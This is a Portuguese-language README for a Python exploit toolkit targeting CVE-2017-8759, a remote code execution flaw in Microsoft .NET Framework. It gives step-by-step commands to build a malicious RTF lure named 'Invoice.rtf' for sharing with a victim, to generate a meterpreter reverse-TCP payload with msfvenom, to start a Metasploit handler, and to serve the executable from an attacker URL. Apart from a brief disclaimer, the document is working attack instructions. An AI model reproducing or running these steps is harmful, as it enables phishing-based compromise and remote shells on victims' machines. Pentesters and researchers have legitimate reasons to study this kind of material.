
Script Python para gerar arquivos RTF maliciosos explorando CVE-2017-8759 (Microsoft .NET Framework RCE) e entregar payloads Metasploit/meterpreter para testes de penetração.
Exploit toolkit CVE-2017-8759 - v1.0 é um script Python útil que fornece a pentesters e pesquisadores de segurança uma maneira rápida e eficaz de testar RCE no Microsoft .NET Framework. Ele pode gerar um arquivo RTF malicioso e entregar metasploit/meterpreter/outros payloads à vítima sem qualquer configuração complexa.
Este programa é apenas para fins educacionais. Não o utilize sem permissão. O aviso padrão se aplica, especialmente o fato de que eu (bhdresh) não sou responsável por quaisquer danos causados pelo uso direto ou indireto das informações ou funcionalidades fornecidas por estes programas. O autor ou qualquer provedor de Internet NÃO assume responsabilidade pelo conteúdo ou uso indevido destes programas ou quaisquer derivados. Ao usar este programa, você aceita que qualquer dano (perda de dados, falha do sistema, comprometimento do sistema, etc.) causado pelo uso destes programas não é de responsabilidade do bhdresh.
Finalmente, este é um desenvolvimento pessoal, por favor respeite sua filosofia e não o use para coisas ruins!
Licença CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
Foram introduzidas as seguintes capacidades ao script
- Gerar arquivo RTF malicioso
- Modo de exploração para o arquivo RTF gerado
Versão: Python versão 2.7.13
1) Gerar arquivo RTF malicioso
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Opcional, se estiver usando payload MSF): Gerar payload metasploit e iniciar handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Iniciar o toolkit em modo de exploração para entregar payload local
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
Este é um toolkit útil para explorar CVE-2017-8759 (RCE no Microsoft .NET Framework)
Modos:
-M gen Gerar apenas o arquivo malicioso
Gerar arquivo RTF malicioso:
-w <Filename.rtf> Nome do arquivo RTF malicioso (Compartilhe este arquivo com a vítima).
-u <http://attacker.com/test.txt> Caminho do arquivo txt remoto. Normalmente, deve ser um domínio ou IP onde esta ferramenta está sendo executada.
Por exemplo, http://attackerip.com/test.txt (Esta URL será incluída no arquivo RTF malicioso e será solicitada quando a vítima abrir o arquivo RTF malicioso.
-M exp Iniciar modo de exploração
Exploração:
-p <TCP port:Default 80> Número da porta local.
-e <http://attacker.com/shell.exe> Caminho de um arquivo executável / shell meterpreter / payload que precisa ser executado no alvo.
-l </tmp/shell.exe> Especificar caminho local de um arquivo executável / shell meterpreter / payload.
@bhdresh
@Voulnet, @vysec, @bhdresh
Obviamente, não sou um desenvolvedor em tempo integral, então espere alguns contratempos
Por favor, reporte bugs e problemas através de https://github.com/bhdresh/CVE-2017-8759/issues/new